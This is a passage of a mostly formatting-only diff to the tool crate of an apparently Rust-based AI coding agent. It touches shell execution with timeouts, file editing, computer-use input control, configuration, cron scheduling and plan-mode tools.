-                        .stderr(Stdio::piped())
-                        .stdin(Stdio::null())
-                        .spawn()
-                };
+        let result = tokio::time::timeout(Duration::from_millis(timeout_ms), async {
+            let child = if cfg!(windows) {
+                Command::new("cmd")
+                    .arg("/C")
+                    .arg(&command_clone)
+                    .current_dir(&cwd)
+                    .stdout(Stdio::piped())
+                    .stderr(Stdio::piped())
+                    .stdin(Stdio::null())
+                    .spawn()
+            } else {
+                Command::new("bash")
+                    .arg("-c")
+                    .arg(&command_clone)
+                    .current_dir(&cwd)
+                    .stdout(Stdio::piped())
+                    .stderr(Stdio::piped())
+                    .stdin(Stdio::null())
+                    .spawn()
+            };
 
-                match child {
-                    Ok(mut c) => {
-                        // Record PID in the registry.
-                        if let Some(pid) = c.id() {
-                            global_registry().set_pid(&task_id_clone, pid);
-                        }
+            match child {
+                Ok(mut c) => {
+                    // Record PID in the registry.
+                    if let Some(pid) = c.id() {
+                        global_registry().set_pid(&task_id_clone, pid);
+                    }
 
-                        let stdout = c.stdout.take();
-                        let stderr = c.stderr.take();
+                    let stdout = c.stdout.take();
+                    let stderr = c.stderr.take();
 
-                        if let Some(out) = stdout {
-                            let mut lines = BufReader::new(out).lines();
-                            while let Ok(Some(line)) = lines.next_line().await {
-                                global_registry().append_output(&task_id_clone, &line);
-                            }
-                        }
-                        if let Some(err) = stderr {
-                            let mut lines = BufReader::new(err).lines();
-                            while let Ok(Some(line)) = lines.next_line().await {
-                                let err_line = format!("STDERR: {}", line);
-                                global_registry().append_output(&task_id_clone, &err_line);
-                            }
-                        }
-
-                        match c.wait().await {
-                            Ok(status) if status.success() => {
-                                global_registry().complete(&task_id_clone);
-                            }
-                            Ok(status) => {
-                                let code = status.code().unwrap_or(-1);
-                                global_registry().update_status(
-                                    &task_id_clone,
-                                    claurst_core::tasks::TaskStatus::Failed(
-                                        format!("exit code {}", code)
-                                    ),
-                                );
-                            }
-                            Err(e) => {
-                                global_registry().update_status(
-                                    &task_id_clone,
-                                    claurst_core::tasks::TaskStatus::Failed(e.to_string()),
-                                );
-                            }
+                    if let Some(out) = stdout {
+                        let mut lines = BufReader::new(out).lines();
+                        while let Ok(Some(line)) = lines.next_line().await {
+                            global_registry().append_output(&task_id_clone, &line);
                         }
                     }
-                    Err(e) => {
-                        global_registry().update_status(
-                            &task_id_clone,
-                            claurst_core::tasks::TaskStatus::Failed(e.to_string()),
-                        );
+                    if let Some(err) = stderr {
+                        let mut lines = BufReader::new(err).lines();
+                        while let Ok(Some(line)) = lines.next_line().await {
+                            let err_line = format!("STDERR: {}", line);
+                            global_registry().append_output(&task_id_clone, &err_line);
+                        }
+                    }
+
+                    match c.wait().await {
+                        Ok(status) if status.success() => {
+                            global_registry().complete(&task_id_clone);
+                        }
+                        Ok(status) => {
+                            let code = status.code().unwrap_or(-1);
+                            global_registry().update_status(
+                                &task_id_clone,
+                                claurst_core::tasks::TaskStatus::Failed(format!(
+                                    "exit code {}",
+                                    code
+                                )),
+                            );
+                        }
+                        Err(e) => {
+                            global_registry().update_status(
+                                &task_id_clone,
+                                claurst_core::tasks::TaskStatus::Failed(e.to_string()),
+                            );
+                        }
                     }
                 }
+                Err(e) => {
+                    global_registry().update_status(
+                        &task_id_clone,
+                        claurst_core::tasks::TaskStatus::Failed(e.to_string()),
+                    );
+                }
             }
-        )
+        })
         .await;
 
         if result.is_err() {
             global_registry().update_status(
                 &task_id_clone,
-                claurst_core::tasks::TaskStatus::Failed(format!("timed out after {}ms", timeout_ms)),
+                claurst_core::tasks::TaskStatus::Failed(format!(
+                    "timed out after {}ms",
+                    timeout_ms
+                )),
             );
         }
     });
@@ -332,7 +336,15 @@ impl Tool for BashTool {
 
         // On Windows fall back to a simpler cmd invocation without state wrapping.
         if cfg!(windows) {
-            return self.execute_windows(&params.command, ctx, &shell_state_arc, timeout_dur, timeout_ms).await;
+            return self
+                .execute_windows(
+                    &params.command,
+                    ctx,
+                    &shell_state_arc,
+                    timeout_dur,
+                    timeout_ms,
+                )
+                .await;
         }
 
         // Build a wrapper script that restores and then captures shell state.
@@ -384,9 +396,7 @@ impl Tool for BashTool {
 
         match result {
             Ok((stdout_lines, stderr_lines, status)) => {
-                let exit_code = status
-                    .map(|s| s.code().unwrap_or(-1))
-                    .unwrap_or(-1);
+                let exit_code = status.map(|s| s.code().unwrap_or(-1)).unwrap_or(-1);
 
                 // Split stdout into user-visible output and the state block.
                 let sentinel_pos = stdout_lines
@@ -555,7 +565,10 @@ impl BashTool {
                     );
                 }
                 if exit_code != 0 {
-                    ToolResult::error(format!("Command exited with code {}\n{}", exit_code, output))
+                    ToolResult::error(format!(
+                        "Command exited with code {}\n{}",
+                        exit_code, output
+                    ))
                 } else {
                     ToolResult::success(output)
                 }

--- a/src-rust/crates/tools/src/batch_edit.rs
+++ b/src-rust/crates/tools/src/batch_edit.rs
@@ -90,15 +90,10 @@ impl Tool for BatchEditTool {
         }
 
         // Permission check (one check covers the whole batch).
-        let description = params
-            .description
-            .as_deref()
-            .unwrap_or("batch file edits");
-        if let Err(e) = ctx.check_permission(
-            self.name(),
-            &format!("BatchEdit: {}", description),
-            false,
-        ) {
+        let description = params.description.as_deref().unwrap_or("batch file edits");
+        if let Err(e) =
+            ctx.check_permission(self.name(), &format!("BatchEdit: {}", description), false)
+        {
             return ToolResult::error(e.to_string());
         }
 

--- a/src-rust/crates/tools/src/brief.rs
+++ b/src-rust/crates/tools/src/brief.rs
@@ -26,7 +26,9 @@ struct BriefInput {
     status: String,
 }
 
-fn default_status() -> String { "normal".to_string() }
+fn default_status() -> String {
+    "normal".to_string()
+}
 
 #[derive(Debug, Serialize)]
 struct AttachmentMeta {
@@ -37,7 +39,9 @@ struct AttachmentMeta {
 
 #[async_trait]
 impl Tool for BriefTool {
-    fn name(&self) -> &str { "Brief" }
+    fn name(&self) -> &str {
+        "Brief"
+    }
 
     fn description(&self) -> &str {
         "Send a formatted message to the user, optionally with file attachments. \
@@ -46,7 +50,9 @@ impl Tool for BriefTool {
          Use status=\"normal\" when replying to something the user just said."
     }
 
-    fn permission_level(&self) -> PermissionLevel { PermissionLevel::None }
+    fn permission_level(&self) -> PermissionLevel {
+        PermissionLevel::None
+    }
 
     fn input_schema(&self) -> Value {
         json!({
@@ -128,9 +134,7 @@ impl Tool for BriefTool {
 // ---------------------------------------------------------------------------
 
 async fn resolve_attachment(path: &Path) -> Result<AttachmentMeta, String> {
-    let meta = tokio::fs::metadata(path)
-        .await
-        .map_err(|e| e.to_string())?;
+    let meta = tokio::fs::metadata(path).await.map_err(|e| e.to_string())?;
 
     if !meta.is_file() {
         return Err("not a file".to_string());
@@ -140,7 +144,12 @@ async fn resolve_attachment(path: &Path) -> Result<AttachmentMeta, String> {
     let is_image = path
         .extension()
         .and_then(|e| e.to_str())
-        .map(|e| matches!(e.to_lowercase().as_str(), "png" | "jpg" | "jpeg" | "gif" | "webp" | "svg"))
+        .map(|e| {
+            matches!(
+                e.to_lowercase().as_str(),
+                "png" | "jpg" | "jpeg" | "gif" | "webp" | "svg"
+            )
+        })
         .unwrap_or(false);
 
     Ok(AttachmentMeta {

--- a/src-rust/crates/tools/src/bundled_skills.rs
+++ b/src-rust/crates/tools/src/bundled_skills.rs
@@ -415,9 +415,9 @@ $ARGUMENTS"#,
 /// Find a bundled skill by name or alias (case-insensitive).
 pub fn find_bundled_skill(name: &str) -> Option<&'static BundledSkill> {
     let lower = name.to_lowercase();
-    BUNDLED_SKILLS.iter().find(|s| {
-        s.name == lower || s.aliases.iter().any(|a| *a == lower)
-    })
+    BUNDLED_SKILLS
+        .iter()
+        .find(|s| s.name == lower || s.aliases.iter().any(|a| *a == lower))
 }
 
 /// Return `(name, description)` pairs for all user-invocable bundled skills.
@@ -488,11 +488,7 @@ mod tests {
     fn skill_names_are_unique() {
         let mut seen = std::collections::HashSet::new();
         for s in BUNDLED_SKILLS {
-            assert!(
-                seen.insert(s.name),
-                "duplicate skill name: {}",
-                s.name
-            );
+            assert!(seen.insert(s.name), "duplicate skill name: {}", s.name);
         }
     }
 

--- a/src-rust/crates/tools/src/computer_use.rs
+++ b/src-rust/crates/tools/src/computer_use.rs
@@ -190,28 +190,22 @@ async fn execute_action(_params: ComputerUseInput) -> ToolResult {
 
 #[cfg(feature = "computer-use")]
 async fn execute_action(params: ComputerUseInput) -> ToolResult {
-    use enigo::{
-        Button, Coordinate, Direction, Enigo, Key, Keyboard, Mouse, Settings,
-    };
+    use enigo::{Button, Coordinate, Direction, Enigo, Key, Keyboard, Mouse, Settings};
 
     match params.action.as_str() {
         // ── Screenshot ───────────────────────────────────────────────────
         "screenshot" => take_screenshot(),
 
         // ── Cursor position ──────────────────────────────────────────────
-        "get_cursor_position" => {
-            match Enigo::new(&Settings::default()) {
-                Ok(enigo) => {
-                    match enigo.location() {
-                        Ok((x, y)) => ToolResult::success(
-                            format!("Cursor position: {{\"x\": {}, \"y\": {}}}", x, y)
-                        ),
-                        Err(e) => ToolResult::error(format!("Failed to get cursor position: {}", e)),
-                    }
+        "get_cursor_position" => match Enigo::new(&Settings::default()) {
+            Ok(enigo) => match enigo.location() {
+                Ok((x, y)) => {
+                    ToolResult::success(format!("Cursor position: {{\"x\": {}, \"y\": {}}}", x, y))
                 }
-                Err(e) => ToolResult::error(format!("Failed to initialise input controller: {}", e)),
-            }
-        }
+                Err(e) => ToolResult::error(format!("Failed to get cursor position: {}", e)),
+            },
+            Err(e) => ToolResult::error(format!("Failed to initialise input controller: {}", e)),
+        },
 
         // ── Mouse move ───────────────────────────────────────────────────
         "mouse_move" => {
@@ -220,13 +214,13 @@ async fn execute_action(params: ComputerUseInput) -> ToolResult {
                 None => return ToolResult::error("mouse_move requires 'coordinate' field"),
             };
             match Enigo::new(&Settings::default()) {
-                Ok(mut enigo) => {
-                    match enigo.move_mouse(x, y, Coordinate::Abs) {
-                        Ok(()) => ToolResult::success(format!("Moved mouse to ({}, {})", x, y)),
-                        Err(e) => ToolResult::error(format!("mouse_move failed: {}", e)),
-                    }
+                Ok(mut enigo) => match enigo.move_mouse(x, y, Coordinate::Abs) {
+                    Ok(()) => ToolResult::success(format!("Moved mouse to ({}, {})", x, y)),
+                    Err(e) => ToolResult::error(format!("mouse_move failed: {}", e)),
+                },
+                Err(e) => {
+                    ToolResult::error(format!("Failed to initialise input controller: {}", e))
                 }
-                Err(e) => ToolResult::error(format!("Failed to initialise input controller: {}", e)),
             }
         }
 
@@ -246,7 +240,9 @@ async fn execute_action(params: ComputerUseInput) -> ToolResult {
                         Err(e) => ToolResult::error(format!("left_click failed: {}", e)),
                     }
                 }
-                Err(e) => ToolResult::error(format!("Failed to initialise input controller: {}", e)),
+                Err(e) => {
+                    ToolResult::error(format!("Failed to initialise input controller: {}", e))
+                }
             }
         }
 
@@ -266,7 +262,9 @@ async fn execute_action(params: ComputerUseInput) -> ToolResult {
                         Err(e) => ToolResult::error(format!("right_click failed: {}", e)),
                     }
                 }
-                Err(e) => ToolResult::error(format!("Failed to initialise input controller: {}", e)),
+                Err(e) => {
+                    ToolResult::error(format!("Failed to initialise input controller: {}", e))
+                }
             }
         }
 
@@ -282,14 +280,21 @@ async fn execute_action(params: ComputerUseInput) -> ToolResult {
                         return ToolResult::error(format!("double_click move failed: {}", e));
                     }
                     if let Err(e) = enigo.button(Button::Left, Direction::Click) {
-                        return ToolResult::error(format!("double_click first click failed: {}", e));
+                        return ToolResult::error(format!(
+                            "double_click first click failed: {}",
+                            e
+                        ));
                     }
                     match enigo.button(Button::Left, Direction::Click) {
                         Ok(()) => ToolResult::success(format!("Double-clicked at ({}, {})", x, y)),
-                        Err(e) => ToolResult::error(format!("double_click second click failed: {}", e)),
+                        Err(e) => {
+                            ToolResult::error(format!("double_click second click failed: {}", e))
+                        }
                     }
                 }
-                Err(e) => ToolResult::error(format!("Failed to initialise input controller: {}", e)),
+                Err(e) => {
+                    ToolResult::error(format!("Failed to initialise input controller: {}", e))
+                }
             }
         }
 
@@ -297,17 +302,24 @@ async fn execute_action(params: ComputerUseInput) -> ToolResult {
         "left_click_drag" => {
             let [sx, sy] = match params.start_coordinate {
                 Some(c) => c,
-                None => return ToolResult::error("left_click_drag requires 'start_coordinate' field"),
+                None => {
+                    return ToolResult::error("left_click_drag requires 'start_coordinate' field")
+                }
             };
             let [ex, ey] = match params.end_coordinate {
                 Some(c) => c,
-                None => return ToolResult::error("left_click_drag requires 'end_coordinate' field"),
+                None => {
+                    return ToolResult::error("left_click_drag requires 'end_coordinate' field")
+                }
             };
             match Enigo::new(&Settings::default()) {
                 Ok(mut enigo) => {
                     // Move to start, press, move to end, release.
                     if let Err(e) = enigo.move_mouse(sx, sy, Coordinate::Abs) {
-                        return ToolResult::error(format!("left_click_drag: move to start failed: {}", e));
+                        return ToolResult::error(format!(
+                            "left_click_drag: move to start failed: {}",
+                            e
+                        ));
                     }
                     if let Err(e) = enigo.button(Button::Left, Direction::Press) {
                         return ToolResult::error(format!("left_click_drag: press failed: {}", e));
@@ -315,16 +327,24 @@ async fn execute_action(params: ComputerUseInput) -> ToolResult {
                     if let Err(e) = enigo.move_mouse(ex, ey, Coordinate::Abs) {
                         // Best-effort release on error.
                         let _ = enigo.button(Button::Left, Direction::Release);
-                        return ToolResult::error(format!("left_click_drag: drag move failed: {}", e));
+                        return ToolResult::error(format!(
+                            "left_click_drag: drag move failed: {}",
+                            e
+                        ));
                     }
                     match enigo.button(Button::Left, Direction::Release) {
                         Ok(()) => ToolResult::success(format!(
-                            "Dragged from ({}, {}) to ({}, {})", sx, sy, ex, ey
+                            "Dragged from ({}, {}) to ({}, {})",
+                            sx, sy, ex, ey
                         )),
-                        Err(e) => ToolResult::error(format!("left_click_drag: release failed: {}", e)),
+                        Err(e) => {
+                            ToolResult::error(format!("left_click_drag: release failed: {}", e))
+                        }
                     }
                 }
-                Err(e) => ToolResult::error(format!("Failed to initialise input controller: {}", e)),
+                Err(e) => {
+                    ToolResult::error(format!("Failed to initialise input controller: {}", e))
+                }
             }
         }
 
@@ -335,13 +355,15 @@ async fn execute_action(params: ComputerUseInput) -> ToolResult {
                 None => return ToolResult::error("type_text requires 'text' field"),
             };
             match Enigo::new(&Settings::default()) {
-                Ok(mut enigo) => {
-                    match enigo.text(&text) {
-                        Ok(()) => ToolResult::success(format!("Typed {} characters", text.chars().count())),
-                        Err(e) => ToolResult::error(format!("type_text failed: {}", e)),
+                Ok(mut enigo) => match enigo.text(&text) {
+                    Ok(()) => {
+                        ToolResult::success(format!("Typed {} characters", text.chars().count()))
                     }
+                    Err(e) => ToolResult::error(format!("type_text failed: {}", e)),
+                },
+                Err(e) => {
+                    ToolResult::error(format!("Failed to initialise input controller: {}", e))
                 }
-                Err(e) => ToolResult::error(format!("Failed to initialise input controller: {}", e)),
             }
         }
 
@@ -352,13 +374,13 @@ async fn execute_action(params: ComputerUseInput) -> ToolResult {
                 None => return ToolResult::error("key requires 'text' field with key sequence"),
             };
             match Enigo::new(&Settings::default()) {
-                Ok(mut enigo) => {
-                    match press_key_sequence(&mut enigo, &key_str) {
-                        Ok(()) => ToolResult::success(format!("Pressed key: {}", key_str)),
-                        Err(e) => ToolResult::error(format!("key failed: {}", e)),
-                    }
+                Ok(mut enigo) => match press_key_sequence(&mut enigo, &key_str) {
+                    Ok(()) => ToolResult::success(format!("Pressed key: {}", key_str)),
+                    Err(e) => ToolResult::error(format!("key failed: {}", e)),
+                },
+                Err(e) => {
+                    ToolResult::error(format!("Failed to initialise input controller: {}", e))
                 }
-                Err(e) => ToolResult::error(format!("Failed to initialise input controller: {}", e)),
             }
         }
 
@@ -384,18 +406,24 @@ async fn execute_action(params: ComputerUseInput) -> ToolResult {
                         "down" => enigo.scroll(amount, enigo::Axis::Vertical),
                         "left" => enigo.scroll(-amount, enigo::Axis::Horizontal),
                         "right" => enigo.scroll(amount, enigo::Axis::Horizontal),
-                        other => return ToolResult::error(format!(
-                            "scroll: unknown direction '{}'. Use up/down/left/right", other
-                        )),
+                        other => {
+                            return ToolResult::error(format!(
+                                "scroll: unknown direction '{}'. Use up/down/left/right",
+                                other
+                            ))
+                        }
                     };
                     match result {
                         Ok(()) => ToolResult::success(format!(
-                            "Scrolled {} by {} at ({}, {})", direction, amount, x, y
+                            "Scrolled {} by {} at ({}, {})",
+                            direction, amount, x, y
                         )),
                         Err(e) => ToolResult::error(format!("scroll failed: {}", e)),
                     }
                 }
-                Err(e) => ToolResult::error(format!("Failed to initialise input controller: {}", e)),
+                Err(e) => {
+                    ToolResult::error(format!("Failed to initialise input controller: {}", e))
+                }
             }
         }
 
@@ -441,11 +469,9 @@ fn take_screenshot() -> ToolResult {
     let scaled = if scale < 1.0 {
         let new_w = (orig_w as f64 * scale).round() as u32;
         let new_h = (orig_h as f64 * scale).round() as u32;
-        image::DynamicImage::ImageRgba8(image).resize(
-            new_w,
-            new_h,
-            image::imageops::FilterType::Lanczos3,
-        ).to_rgba8()
+        image::DynamicImage::ImageRgba8(image)
+            .resize(new_w, new_h, image::imageops::FilterType::Lanczos3)
+            .to_rgba8()
     } else {
         image
     };
@@ -454,7 +480,8 @@ fn take_screenshot() -> ToolResult {
     let mut jpeg_bytes: Vec<u8> = Vec::new();
     {
         let mut cursor = std::io::Cursor::new(&mut jpeg_bytes);
-        let mut encoder = image::codecs::jpeg::JpegEncoder::new_with_quality(&mut cursor, JPEG_QUALITY);
+        let mut encoder =
+            image::codecs::jpeg::JpegEncoder::new_with_quality(&mut cursor, JPEG_QUALITY);
         if let Err(e) = encoder.encode_image(&image::DynamicImage::ImageRgba8(scaled)) {
             return ToolResult::error(format!("JPEG encoding failed: {}", e));
         }
@@ -464,7 +491,10 @@ fn take_screenshot() -> ToolResult {
 
     ToolResult::success(format!(
         "Screenshot captured ({}x{} → JPEG, {} bytes base64).\ndata:image/jpeg;base64,{}",
-        orig_w, orig_h, b64.len(), b64
+        orig_w,
+        orig_h,
+        b64.len(),
+        b64
     ))
 }
 
@@ -548,39 +578,39 @@ fn parse_key(s: &str) -> Result<enigo::Key, Box<dyn std::error::Error + Send + S
 
     let key = match s.to_ascii_lowercase().as_str() {
         // Modifiers
-        "ctrl" | "control"              => Key::Control,
-        "alt"                           => Key::Alt,
-        "shift"                         => Key::Shift,
+        "ctrl" | "control" => Key::Control,
+        "alt" => Key::Alt,
+        "shift" => Key::Shift,
         "super" | "meta" | "win" | "cmd" | "command" => Key::Meta,
 
         // Navigation / special
-        "return" | "enter"              => Key::Return,
-        "escape" | "esc"                => Key::Escape,
-        "tab"                           => Key::Tab,
-        "backspace"                     => Key::Backspace,
-        "delete" | "del"                => Key::Delete,
-        "insert"                        => Key::Insert,
-        "home"                          => Key::Home,
-        "end"                           => Key::End,
-        "pageup" | "page_up"            => Key::PageUp,
-        "pagedown" | "page_down"        => Key::PageDown,
-        "up"                            => Key::UpArrow,
-        "down"                          => Key::DownArrow,
-        "left"                          => Key::LeftArrow,
-        "right"                         => Key::RightArrow,
-        "space"                         => Key::Space,
-        "capslock" | "caps_lock"        => Key::CapsLock,
+        "return" | "enter" => Key::Return,
+        "escape" | "esc" => Key::Escape,
+        "tab" => Key::Tab,
+        "backspace" => Key::Backspace,
+        "delete" | "del" => Key::Delete,
+        "insert" => Key::Insert,
+        "home" => Key::Home,
+        "end" => Key::End,
+        "pageup" | "page_up" => Key::PageUp,
+        "pagedown" | "page_down" => Key::PageDown,
+        "up" => Key::UpArrow,
+        "down" => Key::DownArrow,
+        "left" => Key::LeftArrow,
+        "right" => Key::RightArrow,
+        "space" => Key::Space,
+        "capslock" | "caps_lock" => Key::CapsLock,
 
         // Function keys
-        "f1"  => Key::F1,
-        "f2"  => Key::F2,
-        "f3"  => Key::F3,
-        "f4"  => Key::F4,
-        "f5"  => Key::F5,
-        "f6"  => Key::F6,
-        "f7"  => Key::F7,
-        "f8"  => Key::F8,
-        "f9"  => Key::F9,
+        "f1" => Key::F1,
+        "f2" => Key::F2,
+        "f3" => Key::F3,
+        "f4" => Key::F4,
+        "f5" => Key::F5,
+        "f6" => Key::F6,
+        "f7" => Key::F7,
+        "f8" => Key::F8,
+        "f9" => Key::F9,
         "f10" => Key::F10,
         "f11" => Key::F11,
         "f12" => Key::F12,
@@ -752,12 +782,18 @@ mod tests {
     fn test_computer_use_tool_schema_has_action() {
         let schema = ComputerUseTool.input_schema();
         let props = schema["properties"].as_object().unwrap();
-        assert!(props.contains_key("action"), "schema must have 'action' property");
+        assert!(
+            props.contains_key("action"),
+            "schema must have 'action' property"
+        );
     }
 
     #[test]
     fn test_computer_use_permission_level_is_dangerous() {
-        assert_eq!(ComputerUseTool.permission_level(), PermissionLevel::Dangerous);
+        assert_eq!(
+            ComputerUseTool.permission_level(),
+            PermissionLevel::Dangerous
+        );
     }
 
     #[test]

--- a/src-rust/crates/tools/src/config_tool.rs
+++ b/src-rust/crates/tools/src/config_tool.rs
@@ -20,13 +20,21 @@ static SUPPORTED_SETTINGS: &[(&str, &str)] = &[
     ("model", "LLM model to use (e.g. 'claude-opus-4-6')"),
     ("max_tokens", "Maximum output tokens per response"),
     ("verbose", "Enable verbose logging (true/false)"),
-    ("permission_mode", "Permission mode: default | accept_edits | bypass_permissions | plan"),
-    ("auto_compact", "Auto-compact conversation when context fills (true/false)"),
+    (
+        "permission_mode",
+        "Permission mode: default | accept_edits | bypass_permissions | plan",
+    ),
+    (
+        "auto_compact",
+        "Auto-compact conversation when context fills (true/false)",
+    ),
 ];
 
 #[async_trait]
 impl Tool for ConfigTool {
-    fn name(&self) -> &str { "Config" }
+    fn name(&self) -> &str {
+        "Config"
+    }
 
     fn description(&self) -> &str {
         "Get or set Claurst configuration settings. Omit 'value' to read the current value. \
@@ -34,7 +42,9 @@ impl Tool for ConfigTool {
          Changes persist to ~/.claurst/settings.json."
     }
 
-    fn permission_level(&self) -> PermissionLevel { PermissionLevel::Write }
+    fn permission_level(&self) -> PermissionLevel {
+        PermissionLevel::Write
+    }
 
     fn input_schema(&self) -> Value {
         json!({
@@ -66,10 +76,7 @@ impl Tool for ConfigTool {
                 .iter()
                 .map(|(k, d)| format!("  {} — {}", k, d))
                 .collect();
-            return ToolResult::success(format!(
-                "Supported settings:\n{}",
-                lines.join("\n")
-            ));
+            return ToolResult::success(format!("Supported settings:\n{}", lines.join("\n")));
         }
 
         // Load current settings
@@ -95,7 +102,11 @@ impl Tool for ConfigTool {
                 "max_tokens" => {
                     let n = match new_value.as_u64() {
                         Some(n) => n as u32,
-                        None => return ToolResult::error("'max_tokens' must be a positive integer".to_string()),
+                        None => {
+                            return ToolResult::error(
+                                "'max_tokens' must be a positive integer".to_string(),
+                            )
+                        }
                     };
                     settings.config.max_tokens = Some(n);
                     if let Err(e) = settings.save().await {
@@ -106,7 +117,9 @@ impl Tool for ConfigTool {
                 "verbose" => {
                     let b = match new_value.as_bool() {
                         Some(b) => b,
-                        None => return ToolResult::error("'verbose' must be true or false".to_string()),
+                        None => {
+                            return ToolResult::error("'verbose' must be true or false".to_string())
+                        }
                     };
                     settings.config.verbose = b;
                     if let Err(e) = settings.save().await {
@@ -117,7 +130,11 @@ impl Tool for ConfigTool {
                 "auto_compact" => {
                     let b = match new_value.as_bool() {
                         Some(b) => b,
-                        None => return ToolResult::error("'auto_compact' must be true or false".to_string()),
+                        None => {
+                            return ToolResult::error(
+                                "'auto_compact' must be true or false".to_string(),
+                            )
+                        }
                     };
                     settings.config.auto_compact = b;
                     if let Err(e) = settings.save().await {
@@ -129,7 +146,11 @@ impl Tool for ConfigTool {
                     use claurst_core::config::PermissionMode;
                     let s = match new_value.as_str() {
                         Some(s) => s,
-                        None => return ToolResult::error("'permission_mode' must be a string".to_string()),
+                        None => {
+                            return ToolResult::error(
+                                "'permission_mode' must be a string".to_string(),
+                            )
+                        }
                     };
                     let mode = match s {
                         "default" => PermissionMode::Default,
@@ -167,14 +188,10 @@ impl Tool for ConfigTool {
                     "max_tokens = {}",
                     settings.config.effective_max_tokens()
                 )),
-                "verbose" => ToolResult::success(format!(
-                    "verbose = {}",
-                    settings.config.verbose
-                )),
-                "auto_compact" => ToolResult::success(format!(
-                    "auto_compact = {}",
-                    settings.config.auto_compact
-                )),
+                "verbose" => ToolResult::success(format!("verbose = {}", settings.config.verbose)),
+                "auto_compact" => {
+                    ToolResult::success(format!("auto_compact = {}", settings.config.auto_compact))
+                }
                 "permission_mode" => ToolResult::success(format!(
                     "permission_mode = \"{}\"",
                     permission_mode_str(&settings.config.permission_mode)

--- a/src-rust/crates/tools/src/cron.rs
+++ b/src-rust/crates/tools/src/cron.rs
@@ -256,11 +256,15 @@ struct CronCreateInput {
     durable: bool,
 }
 
-fn default_true() -> bool { true }
+fn default_true() -> bool {
+    true
+}
 
 #[async_trait]
 impl Tool for CronCreateTool {
-    fn name(&self) -> &str { "CronCreate" }
+    fn name(&self) -> &str {
+        "CronCreate"
+    }
 
     fn description(&self) -> &str {
         "Schedule a recurring or one-shot prompt using a standard 5-field cron expression \
@@ -272,7 +276,9 @@ impl Tool for CronCreateTool {
          Use durable=true to persist across sessions."
     }
 
-    fn permission_level(&self) -> PermissionLevel { PermissionLevel::None }
+    fn permission_level(&self) -> PermissionLevel {
+        PermissionLevel::None
+    }
 
     fn input_schema(&self) -> Value {
         json!({
@@ -380,13 +386,17 @@ struct CronDeleteInput {
 
 #[async_trait]
 impl Tool for CronDeleteTool {
-    fn name(&self) -> &str { "CronDelete" }
+    fn name(&self) -> &str {
+        "CronDelete"
+    }
 
     fn description(&self) -> &str {
         "Cancel a scheduled cron task by its ID. Use CronList to find the ID."
     }
 
-    fn permission_level(&self) -> PermissionLevel { PermissionLevel::None }
+    fn permission_level(&self) -> PermissionLevel {
+        PermissionLevel::None
+    }
 
     fn input_schema(&self) -> Value {
         json!({
@@ -433,13 +443,17 @@ pub struct CronListTool;
 
 #[async_trait]
 impl Tool for CronListTool {
-    fn name(&self) -> &str { "CronList" }
+    fn name(&self) -> &str {
+        "CronList"
+    }
 
     fn description(&self) -> &str {
         "List all currently scheduled cron tasks."
     }
 
-    fn permission_level(&self) -> PermissionLevel { PermissionLevel::None }
+    fn permission_level(&self) -> PermissionLevel {
+        PermissionLevel::None
+    }
 
     fn input_schema(&self) -> Value {
         json!({
@@ -497,14 +511,17 @@ async fn persist_tasks_to_disk(store: &HashMap<String, CronTask>) -> Result<(), 
     let durable: Vec<&CronTask> = store.values().filter(|t| t.durable).collect();
     let json = serde_json::to_string_pretty(&durable).map_err(|e| e.to_string())?;
 
-    let path = scheduled_tasks_path().ok_or_else(|| "Cannot determine home directory".to_string())?;
+    let path =
+        scheduled_tasks_path().ok_or_else(|| "Cannot determine home directory".to_string())?;
     let dir = path.parent().ok_or("No parent directory")?;
 
     tokio::fs::create_dir_all(dir)
         .await
         .map_err(|e| e.to_string())?;
 
-    tokio::fs::write(&path, json).await.map_err(|e| e.to_string())?;
+    tokio::fs::write(&path, json)
+        .await
+        .map_err(|e| e.to_string())?;
 
     Ok(())
 }

--- a/src-rust/crates/tools/src/enter_plan_mode.rs
+++ b/src-rust/crates/tools/src/enter_plan_mode.rs
@@ -44,9 +44,8 @@ impl Tool for EnterPlanModeTool {
     }
 
     async fn execute(&self, input: Value, _ctx: &ToolContext) -> ToolResult {
-        let params: EnterPlanModeInput = serde_json::from_value(input).unwrap_or(EnterPlanModeInput {
-            reason: None,
-        });
+        let params: EnterPlanModeInput =
+            serde_json::from_value(input).unwrap_or(EnterPlanModeInput { reason: None });
 
         debug!(reason = ?params.reason, "Entering plan mode");
 

--- a/src-rust/crates/tools/src/exit_plan_mode.rs
+++ b/src-rust/crates/tools/src/exit_plan_mode.rs
@@ -43,9 +43,8 @@ impl Tool for ExitPlanModeTool {
     }
 
     async fn execute(&self, input: Value, _ctx: &ToolContext) -> ToolResult {
-        let params: ExitPlanModeInput = serde_json::from_value(input).unwrap_or(ExitPlanModeInput {
-            summary: None,
-        });
+        let params: ExitPlanModeInput =
+            serde_json::from_value(input).unwrap_or(ExitPlanModeInput { summary: None });
 
         debug!(summary = ?params.summary, "Exiting plan mode");
 

--- a/src-rust/crates/tools/src/file_edit.rs
+++ b/src-rust/crates/tools/src/file_edit.rs
@@ -68,20 +68,16 @@ impl Tool for FileEditTool {
 
         // Validate old != new
         if params.old_string == params.new_string {
-            return ToolResult::error(
-                "old_string and new_string must be different".to_string(),
-            );
+            return ToolResult::error("old_string and new_string must be different".to_string());
         }
 
         let path = ctx.resolve_path(&params.file_path);
         debug!(path = %path.display(), "Editing file");
 
         // Permission check
-        if let Err(e) = ctx.check_permission(
-            self.name(),
-            &format!("Edit {}", path.display()),
-            false,
-        ) {
+        if let Err(e) =
+            ctx.check_permission(self.name(), &format!("Edit {}", path.display()), false)
+        {
             return ToolResult::error(e.to_string());
         }
 
@@ -89,11 +85,7 @@ impl Tool for FileEditTool {
         let content = match tokio::fs::read_to_string(&path).await {
             Ok(c) => c,
             Err(e) => {
-                return ToolResult::error(format!(
-                    "Failed to read file {}: {}",
-                    path.display(),
-                    e
-                ))
+                return ToolResult::error(format!("Failed to read file {}: {}", path.display(), e))
             }
         };
 
@@ -128,11 +120,7 @@ impl Tool for FileEditTool {
 
         // Write back
         if let Err(e) = tokio::fs::write(&path, &new_content).await {
-            return ToolResult::error(format!(
-                "Failed to write file {}: {}",
-                path.display(),
-                e
-            ));
+            return ToolResult::error(format!("Failed to write file {}: {}", path.display(), e));
         }
 
         ctx.record_file_change(

--- a/src-rust/crates/tools/src/file_read.rs
+++ b/src-rust/crates/tools/src/file_read.rs
@@ -115,10 +115,7 @@ impl Tool for FileReadTool {
         };
 
         if content.is_empty() {
-            return ToolResult::success(format!(
-                "[File {} exists but is empty]",
-                path.display()
-            ));
+            return ToolResult::success(format!("[File {} exists but is empty]", path.display()));
         }
 
